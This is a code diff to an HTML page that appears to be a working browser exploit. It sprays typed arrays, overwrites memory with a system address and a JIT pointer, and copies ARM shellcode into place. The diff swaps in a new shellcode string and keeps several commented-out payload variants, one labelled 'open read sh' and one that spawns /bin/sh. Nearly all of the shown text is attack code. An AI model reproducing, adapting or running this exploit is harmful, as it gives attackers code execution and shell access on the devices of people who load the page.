--- a/array.html
+++ b/array.html
@@ -167,8 +167,10 @@ spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x28\x00\x9f\xe5\x28\x10\x9f\xe5\x28\x20\x9f\xe5\x00\x30\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\xfe\xff\xff\xea\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50"
- //open read sh//"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x44\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x34\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x2c\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x20\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50\x08\x02\x00\x50"
+var shellcode="\x28\x40\x14\xe5\x08\x00\x9f\xe5\x08\x10\x9f\xe5\x08\x20\x9f\xe5\x00\xf0\x92\xe5\x40\x00\x00\x50\x00\x00\x00\x00\x00\x01\x00\x50";
+
+    
+    //open read sh//"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x44\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x34\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x2c\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x20\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50\x08\x02\x00\x50"
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x3c\x00\x9f\xe5\x00\x10\xa0\xe3\x04\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x2c\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x24\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50";
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xc7\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1";    //"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
 for(var i=0;i<shellcode.length;i++){
@@ -199,7 +201,7 @@ b+=" ";
 b+=s1.charCodeAt(a+7).toString(16);      
 alert(b);
 }
-alert(func());
+func();
 while(1){
 a=prompt("addr");
 b="";
